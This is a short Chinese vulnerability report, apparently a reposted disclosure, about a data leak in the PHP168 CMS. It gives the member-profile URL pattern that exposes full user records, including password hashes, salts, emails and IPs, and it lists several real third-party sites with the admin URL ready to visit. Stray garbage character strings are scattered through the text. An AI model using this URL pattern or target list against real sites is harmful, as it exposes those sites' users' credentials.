|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile3 d( X9 j9 w. G2 a& x: D- x/ \* O1 M$ |
7 n% Z& Y+ d R0 A% s
以PHP168官方演示站点为例,查看任意用户信息的页面链接为:. a6 x& u9 l/ A5 q( ]
. l# p, Q0 @8 T7 ]
http://php168.cn/com/homepage.php/admin/member-profile0 m- B# O1 `$ V
# Q0 b3 q# ^: U5 `7 _5 W: d. L( |由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。+ C' a) O2 B7 W1 a
http://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg5 P5 ?& r4 F% m5 D
1 w$ b7 q* ^/ h: u! n( O 漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:+ D6 u S9 `6 Z e% y3 p- a
+ q: g' V. U+ {0 M5 X
http://www.zjfzol.com.cn/homepage.php/admin/member-profile
8 j# O4 q/ ?0 n! P
# y: i: y& q9 r. v1 ~& |http://www.scswl.cn/homepage.php/admin/member-profile8 h8 \* s9 n! S4 k
, `( P! F( V0 V1 W7 \" n6 J
http://www.tunet.edu.cn/homepage.php/admin/member-profile" x. e" k. X8 t9 _- @
3 j* q) @* Z( }: w; K
http://www.itlead.com.cn/homepage.php/admin/member-profile
3 i/ W1 [+ e* }+ H8 [ u2 @) e8 K d4 _. q
http://www.aedp.cn/homepage.php/admin/member-profile
4 k" s, `! x' J% j. b
; T4 x6 R8 ]2 |! h4 {, e8 `; ]/ yhttp://www.qianlongnews.com/homepage.php/test/member-profile8 y1 `- W: Z1 B) p( P
1 N1 W/ e4 o0 Q$ y+ F: ^, @' Q; t
http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]1 f) u, [% T1 {
[/table] |